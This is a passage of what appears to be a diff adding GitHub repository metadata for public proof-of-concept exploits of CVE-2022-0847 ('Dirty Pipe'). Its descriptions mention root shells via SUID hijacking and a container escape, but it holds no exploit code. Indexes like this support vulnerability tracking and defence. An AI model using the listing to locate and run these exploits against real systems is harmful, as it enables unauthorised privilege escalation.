"name": "Dirty-Pipe", + "full_name": "crowsec-edtech\/Dirty-Pipe", + "owner": { + "login": "crowsec-edtech", + "id": 97851186, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97851186?v=4", + "html_url": "https:\/\/github.com\/crowsec-edtech", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/crowsec-edtech\/Dirty-Pipe", + "description": "CVE-2022-0847 exploit one liner", + "fork": false, + "created_at": "2022-03-07T20:57:34Z", + "updated_at": "2022-12-09T22:58:15Z", + "pushed_at": "2022-03-07T21:01:15Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 467317090, + "name": "CVE-2022-0847", + "full_name": "lucksec\/CVE-2022-0847", + "owner": { + "login": "lucksec", + "id": 59011386, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59011386?v=4", + "html_url": "https:\/\/github.com\/lucksec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lucksec\/CVE-2022-0847", + "description": null, + "fork": false, + "created_at": "2022-03-08T01:17:09Z", + "updated_at": "2022-12-26T10:39:25Z", + "pushed_at": "2022-03-08T01:50:39Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 467367761, + "name": "CVE-2022-0847", + "full_name": "si1ent-le\/CVE-2022-0847", + "owner": { + "login": "si1ent-le", + "id": 56815669, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56815669?v=4", + "html_url": "https:\/\/github.com\/si1ent-le", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/si1ent-le\/CVE-2022-0847", + "description": "CVE-2022-0487", + "fork": false, + "created_at": "2022-03-08T04:51:02Z", + "updated_at": "2022-03-08T05:15:14Z", + "pushed_at": "2022-03-08T05:18:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 467411192, + "name": "cve-2022-0847dirtypipe-exploit", + "full_name": "bohr777\/cve-2022-0847dirtypipe-exploit", + "owner": { + "login": "bohr777", + "id": 56676965, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56676965?v=4", + "html_url": "https:\/\/github.com\/bohr777", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bohr777\/cve-2022-0847dirtypipe-exploit", + "description": null, + "fork": false, + "created_at": "2022-03-08T07:42:31Z", + "updated_at": "2023-11-18T03:11:10Z", + "pushed_at": "2022-03-08T05:18:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 467439184, + "name": "CVE-2022-0847", + "full_name": "ZZ-SOCMAP\/CVE-2022-0847", + "owner": { + "login": "ZZ-SOCMAP", + "id": 98105412, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98105412?v=4", + "html_url": "https:\/\/github.com\/ZZ-SOCMAP", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ZZ-SOCMAP\/CVE-2022-0847", + "description": "Linux Kernel Local Privilege Escalation Vulnerability CVE-2022-0847.", + "fork": false, + "created_at": "2022-03-08T09:10:51Z", + "updated_at": "2024-11-27T21:12:32Z", + "pushed_at": "2022-03-08T09:14:25Z", + "stargazers_count": 58, + "watchers_count": 58, + "has_discussions": false, + "forks_count": 21, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 21, + "watchers": 58, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 467468720, + "name": "CVE-2022-0847-dirty-pipe-exploit", + "full_name": "cspshivam\/CVE-2022-0847-dirty-pipe-exploit", + "owner": { + "login": "cspshivam", + "id": 59191514, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59191514?v=4", + "html_url": "https:\/\/github.com\/cspshivam", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cspshivam\/CVE-2022-0847-dirty-pipe-exploit", + "description": "An exploit for CVE-2022-0847 dirty-pipe vulnerability", + "fork": false, + "created_at": "2022-03-08T10:40:07Z", + "updated_at": "2024-08-12T20:21:22Z", + "pushed_at": "2022-03-08T11:15:00Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 467490371, + "name": "dirtypipez-exploit", + "full_name": "febinrev\/dirtypipez-exploit", + "owner": { + "login": "febinrev", + "id": 52229330, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52229330?v=4", + "html_url": "https:\/\/github.com\/febinrev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/febinrev\/dirtypipez-exploit", + "description": "CVE-2022-0847 DirtyPipe Exploit.", + "fork": false, + "created_at": "2022-03-08T11:49:40Z", + "updated_at": "2024-11-16T02:56:29Z", + "pushed_at": "2022-03-08T11:52:22Z", + "stargazers_count": 49, + "watchers_count": 49, + "has_discussions": false, + "forks_count": 24, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 24, + "watchers": 49, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 467507788, + "name": "CVE_2022_0847", + "full_name": "ahrixia\/CVE_2022_0847", + "owner": { + "login": "ahrixia", + "id": 35935843, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35935843?v=4", + "html_url": "https:\/\/github.com\/ahrixia", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ahrixia\/CVE_2022_0847", + "description": "CVE-2022-0847: Linux Kernel Privilege Escalation Vulnerability", + "fork": false, + "created_at": "2022-03-08T12:43:43Z", + "updated_at": "2024-08-12T20:21:22Z", + "pushed_at": "2022-03-08T13:15:35Z", + "stargazers_count": 22, + "watchers_count": 22, + "has_discussions": false, + "forks_count": 15, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 15, + "watchers": 22, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 467530713, + "name": "CVE-2022-0847", + "full_name": "knqyf263\/CVE-2022-0847", + "owner": { + "login": "knqyf263", + "id": 2253692, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2253692?v=4", + "html_url": "https:\/\/github.com\/knqyf263", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/knqyf263\/CVE-2022-0847", + "description": "The Dirty Pipe Vulnerability", + "fork": false, + "created_at": "2022-03-08T13:48:55Z", + "updated_at": "2024-11-16T19:50:45Z", + "pushed_at": "2022-03-08T13:54:08Z", + "stargazers_count": 47, + "watchers_count": 47, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 47, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 467552702, + "name": "CVE-2022-0847", + "full_name": "puckiestyle\/CVE-2022-0847", + "owner": { + "login": "puckiestyle", + "id": 57447087, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57447087?v=4", + "html_url": "https:\/\/github.com\/puckiestyle", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/puckiestyle\/CVE-2022-0847", + "description": null, + "fork": false, + "created_at": "2022-03-08T14:46:21Z", + "updated_at": "2024-01-20T21:30:04Z", + "pushed_at": "2022-03-10T08:10:40Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 467569839, + "name": "dirty-pipe", + "full_name": "0xIronGoat\/dirty-pipe", + "owner": { + "login": "0xIronGoat", + "id": 14928858, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14928858?v=4", + "html_url": "https:\/\/github.com\/0xIronGoat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xIronGoat\/dirty-pipe", + "description": "Implementation of Max Kellermann's exploit for CVE-2022-0847", + "fork": false, + "created_at": "2022-03-08T15:30:45Z", + "updated_at": "2023-09-10T14:43:20Z", + "pushed_at": "2022-03-08T15:47:53Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 467570864, + "name": "CVE-2022-0847-DirtyPipe-Exploit", + "full_name": "ITMarcin2211\/CVE-2022-0847-DirtyPipe-Exploit", + "owner": { + "login": "ITMarcin2211", + "id": 60057530, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60057530?v=4", + "html_url": "https:\/\/github.com\/ITMarcin2211", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ITMarcin2211\/CVE-2022-0847-DirtyPipe-Exploit", + "description": null, + "fork": false, + "created_at": "2022-03-08T15:33:39Z", + "updated_at": "2022-03-17T16:07:23Z", + "pushed_at": "2022-03-08T15:36:53Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 467602577, + "name": "CVE-2022-0847-Docker", + "full_name": "mrchucu1\/CVE-2022-0847-Docker", + "owner": { + "login": "mrchucu1", + "id": 12802120, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12802120?v=4", + "html_url": "https:\/\/github.com\/mrchucu1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mrchucu1\/CVE-2022-0847-Docker", + "description": "Docker exploit", + "fork": false, + "created_at": "2022-03-08T17:02:40Z", + "updated_at": "2022-03-08T17:05:05Z", + "pushed_at": "2022-03-08T17:05:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 467606236, + "name": "CVE-2022-0847-dirty-pipe-checker", + "full_name": "basharkey\/CVE-2022-0847-dirty-pipe-checker", + "owner": { + "login": "basharkey", + "id": 15859442, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15859442?v=4", + "html_url": "https:\/\/github.com\/basharkey", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/basharkey\/CVE-2022-0847-dirty-pipe-checker", + "description": "Bash script to check for CVE-2022-0847 \"Dirty Pipe\"", + "fork": false, + "created_at": "2022-03-08T17:13:24Z", + "updated_at": "2024-10-15T16:23:57Z", + "pushed_at": "2023-06-14T23:25:46Z", + "stargazers_count": 64, + "watchers_count": 64, + "has_discussions": false, + "forks_count": 27, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 27, + "watchers": 64, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 467662886, + "name": "CVE-2022-0847", + "full_name": "4luc4rdr5290\/CVE-2022-0847", + "owner": { + "login": "4luc4rdr5290", + "id": 19316088, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19316088?v=4", + "html_url": "https:\/\/github.com\/4luc4rdr5290", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/4luc4rdr5290\/CVE-2022-0847", + "description": "CVE-2022-0847", + "fork": false, + "created_at": "2022-03-08T20:18:28Z", + "updated_at": "2024-05-09T02:22:32Z", + "pushed_at": "2022-03-08T20:41:15Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 467741460, + "name": "CVE-2022-0847_DirtyPipeExploit", + "full_name": "dadhee\/CVE-2022-0847_DirtyPipeExploit", + "owner": { + "login": "dadhee", + "id": 37909237, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37909237?v=4", + "html_url": "https:\/\/github.com\/dadhee", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dadhee\/CVE-2022-0847_DirtyPipeExploit", + "description": "A “Dirty Pipe” vulnerability with CVE-2022-0847 and a CVSS score of 7.8 has been identified, affecting Linux Kernel 5.8 and higher. The vulnerability allows attackers to overwrite data in read-only files. Threat actors can exploit this vulnerability to privilege themselves with code injection.", + "fork": false, + "created_at": "2022-03-09T01:55:04Z", + "updated_at": "2024-08-12T20:21:23Z", + "pushed_at": "2022-03-09T02:01:28Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 467753868, + "name": "CVE-2022-0847-DirtyPipe", + "full_name": "Greetdawn\/CVE-2022-0847-DirtyPipe", + "owner": { + "login": "Greetdawn", + "id": 28551913, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28551913?v=4", + "html_url": "https:\/\/github.com\/Greetdawn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Greetdawn\/CVE-2022-0847-DirtyPipe", + "description": null, + "fork": false, + "created_at": "2022-03-09T02:47:06Z", + "updated_at": "2022-03-09T02:52:32Z", + "pushed_at": "2022-03-11T02:55:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 467753881, + "name": "CVE-2022-0847", + "full_name": "Al1ex\/CVE-2022-0847", + "owner": { + "login": "Al1ex", + "id": 38161463, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38161463?v=4", + "html_url": "https:\/\/github.com\/Al1ex", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Al1ex\/CVE-2022-0847", + "description": "CVE-2022-0847", + "fork": false, + "created_at": "2022-03-09T02:47:08Z", + "updated_at": "2024-11-19T16:43:07Z", + "pushed_at": "2022-03-09T02:47:32Z", + "stargazers_count": 77, + "watchers_count": 77, + "has_discussions": false, + "forks_count": 16, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-0847" + ], + "visibility": "public", + "forks": 16, + "watchers": 77, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 467788339, + "name": "CVE-2022-0847-DirtyPipe-Exploit", + "full_name": "Mustafa1986\/CVE-2022-0847-DirtyPipe-Exploit", + "owner": { + "login": "Mustafa1986", + "id": 27927358, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27927358?v=4", + "html_url": "https:\/\/github.com\/Mustafa1986", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mustafa1986\/CVE-2022-0847-DirtyPipe-Exploit", + "description": null, + "fork": false, + "created_at": "2022-03-09T05:22:20Z", + "updated_at": "2023-04-30T04:51:44Z", + "pushed_at": "2022-03-09T06:16:23Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 467818101, + "name": "Dirtypipe-exploit", + "full_name": "nanaao\/Dirtypipe-exploit", + "owner": { + "login": "nanaao", + "id": 77666853, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77666853?v=4", + "html_url": "https:\/\/github.com\/nanaao", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nanaao\/Dirtypipe-exploit", + "description": "Dirty Pipe (CVE-2022-0847) PoC that hijacks a SUID binary to spawn. a root shell. (and attempts to restore the damaged binary as well)", + "fork": false, + "created_at": "2022-03-09T07:16:57Z", + "updated_at": "2024-08-12T20:21:24Z", + "pushed_at": "2022-03-09T04:43:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 467872655, + "name": "cve-2022-0847dirtypipe-exploit", + "full_name": "AyoubNajim\/cve-2022-0847dirtypipe-exploit", + "owner": { + "login": "AyoubNajim", + "id": 68334573, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68334573?v=4", + "html_url": "https:\/\/github.com\/AyoubNajim", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AyoubNajim\/cve-2022-0847dirtypipe-exploit", + "description": null, + "fork": false, + "created_at": "2022-03-09T10:05:53Z", + "updated_at": "2022-03-10T22:58:10Z", + "pushed_at": "2022-03-09T10:16:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 467878952, + "name": "pentestblog-CVE-2022-0847", + "full_name": "pentestblogin\/pentestblog-CVE-2022-0847", + "owner": { + "login": "pentestblogin", + "id": 70894330, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70894330?v=4", + "html_url": "https:\/\/github.com\/pentestblogin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pentestblogin\/pentestblog-CVE-2022-0847", + "description": null, + "fork": false, + "created_at": "2022-03-09T10:24:42Z", + "updated_at": "2022-03-09T10:26:10Z", + "pushed_at": "2022-03-09T10:26:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 467990193, + "name": "CVE-2022-0847", + "full_name": "gyaansastra\/CVE-2022-0847", + "owner": { + "login": "gyaansastra", + "id": 35690123, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35690123?v=4", + "html_url": "https:\/\/github.com\/gyaansastra", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gyaansastra\/CVE-2022-0847", + "description": "Dirty Pipe POC", + "fork": false, + "created_at": "2022-03-09T15:44:58Z", + "updated_at": "2024-05-09T02:22:17Z", + "pushed_at": "2022-03-20T15:46:04Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 468068745, + "name": "dirtypipe-container-breakout-poc", + "full_name": "DataDog\/dirtypipe-container-breakout-poc", + "owner": { + "login": "DataDog", + "id": 365230, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/365230?v=4", + "html_url": "https:\/\/github.com\/DataDog", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DataDog\/dirtypipe-container-breakout-poc", + "description": "Container Excape PoC for CVE-2022-0847 \"DirtyPipe\"", + "fork": false, + "created_at": "2022-03-09T19:38:44Z", + "updated_at": "2024-10-21T10:38:15Z", + "pushed_at": "2022-04-20T20:23:36Z", + "stargazers_count": 76, + "watchers_count": 76, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 76, + "score": 0, + "subscribers_count": 8 + }, + { + "id": 468143759, + "name": "CVE-2022-0847", + "full_name": "babyshen\/CVE-2022-0847", + "owner": { + "login": "babyshen", + "id": 11402197, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11402197?v=4", + "html_url": "https:\/\/github.com\/babyshen", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/babyshen\/CVE-2022-0847", + "description": "A root exploit for CVE-2022-0847 (Dirty Pipe)", + "fork": false, + "created_at": "2022-03-10T00:54:11Z", + "updated_at": "2022-03-10T01:00:55Z", + "pushed_at": "2022-03-10T01:02:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 468148868, + "name": "CVE-2022-0847-Linux", + "full_name": "edsonjt81\/CVE-2022-0847-Linux", + "owner": { + "login": "edsonjt81", + "id": 27496739, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27496739?v=4", + "html_url": "https:\/\/github.com\/edsonjt81", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/edsonjt81\/CVE-2022-0847-Linux", + "description": null, + "fork": false, + "created_at": "2022-03-10T01:18:26Z", + "updated_at": "2022-03-10T01:18:36Z", + "pushed_at": "2022-03-10T01:18:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 468151065, + "name": "CVE-2022-0847", + "full_name": "chenaotian\/CVE-2022-0847", + "owner": { + "login": "chenaotian", + "id": 86546351, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86546351?v=4", + "html_url": "https:\/\/github.com\/chenaotian", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/chenaotian\/CVE-2022-0847", + "description": "CVE-2022-0847 POC and Docker and Analysis write up", + "fork": false, + "created_at": "2022-03-10T01:27:29Z", + "updated_at": "2024-08-12T20:21:25Z", + "pushed_at": "2022-03-10T01:31:57Z", + "stargazers_count": 25, + "watchers_count": 25, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 25, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 468352446, + "name": "CVE-2022-0847-DirtyPipe-Exploit", + "full_name": "V0WKeep3r\/CVE-2022-0847-DirtyPipe-Exploit", + "owner": { + "login": "V0WKeep3r", + "id": 78677532, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78677532?v=4", + "html_url": "https:\/\/github.com\/V0WKeep3r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/V0WKeep3r\/CVE-2022-0847-DirtyPipe-Exploit", + "description": "CVE-2022-0847-DirtyPipe-Exploit", + "fork": false, + "created_at": "2022-03-10T13:23:52Z", + "updated_at": "2022-03-10T13:40:33Z", + "pushed_at": "2022-03-10T13:41:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 468416712, + "name": "CVE-2022-0847-Dirty-Pipe", + "full_name": "al4xs\/CVE-2022-0847-Dirty-Pipe", + "owner": { + "login": "al4xs", + "id": 40411471, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40411471?v=4", + "html_url": "https:\/\/github.com\/al4xs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/al4xs\/CVE-2022-0847-Dirty-Pipe", + "description": null, + "fork": false, + "created_at": "2022-03-10T16:09:16Z", + "updated_at": "2022-03-10T16:10:15Z", + "pushed_at": "2022-03-10T16:09:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 468586082, + "name": "CVE-2022-0847-DirtyPipe-", + "full_name": "Greetdawn\/CVE-2022-0847-DirtyPipe-", + "owner": { + "login": "Greetdawn", + "id": 28551913, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28551913?v=4", + "html_url": "https:\/\/github.com\/Greetdawn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Greetdawn\/CVE-2022-0847-DirtyPipe-", + "description": null, + "fork": false, + "created_at": "2022-03-11T02:51:54Z", + "updated_at": "2022-03-11T02:51:54Z", + "pushed_at": "2022-03-11T02:51:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 468666839, + "name": "DirtyPipePython", + "full_name": "crusoe112\/DirtyPipePython", + "owner": { + "login": "crusoe112", + "id": 6531586, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6531586?v=4", + "html_url": "https:\/\/github.com\/crusoe112", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/crusoe112\/DirtyPipePython", + "description": "A Python-based DirtyPipe (CVE-2022-0847) POC to pop a root shell", + "fork": false, + "created_at": "2022-03-11T08:22:56Z", + "updated_at": "2023-11-07T15:27:32Z", + "pushed_at": "2022-03-23T22:46:58Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 468964454, + "name": "dirtyPipe-automaticRoot", + "full_name": "nanaao\/dirtyPipe-automaticRoot", + "owner": { + "login": "nanaao", + "id": 77666853, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77666853?v=4", + "html_url": "https:\/\/github.com\/nanaao", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nanaao\/dirtyPipe-automaticRoot", + "description": "CVE-2022-0847 Python exploit to get root or write a no write permission, immutable or read-only mounted file.", + "fork": false, + "created_at": "2022-03-12T03:05:40Z", + "updated_at": "2024-08-12T20:21:28Z", + "pushed_at": "2022-03-11T22:27:18Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 2, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 469063637, + "name": "CVE-2022-0847", + "full_name": "arttnba3\/CVE-2022-0847", + "owner": { + "login": "arttnba3", + "id": 28689148, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28689148?v=4", + "html_url": "https:\/\/github.com\/arttnba3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/arttnba3\/CVE-2022-0847", + "description": "my personal exploit of CVE-2022-0847(dirty pipe)", + "fork": false, + "created_at": "2022-03-12T11:31:46Z", + "updated_at": "2024-06-17T00:32:08Z", + "pushed_at": "2024-06-17T00:32:05Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 469198555, + "name": "CVE-2022-0847-DirtyPipe-Exploits", + "full_name": "AlexisAhmed\/CVE-2022-0847-DirtyPipe-Exploits", + "owner": { + "login": "AlexisAhmed", + "id": 13276084, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13276084?v=4", + "html_url": "https:\/\/github.com\/AlexisAhmed", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AlexisAhmed\/CVE-2022-0847-DirtyPipe-Exploits", + "description": "A collection of exploits and documentation that can be used to exploit the Linux Dirty Pipe vulnerability.", + "fork": false, + "created_at": "2022-03-12T20:57:24Z", + "updated_at": "2024-11-27T02:38:28Z", + "pushed_at": "2023-05-20T05:55:45Z", + "stargazers_count": 555, + "watchers_count": 555, + "has_discussions": false, + "forks_count": 141, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 141, + "watchers": 555, + "score": 0, + "subscribers_count": 15 + }, + { + "id": 469282891, + "name": "Dirty-Pipe-CVE-2022-0847", + "full_name": "sa-infinity8888\/Dirty-Pipe-CVE-2022-0847", + "owner": { + "login": "sa-infinity8888", + "id": 95272899, + "avatar_url": 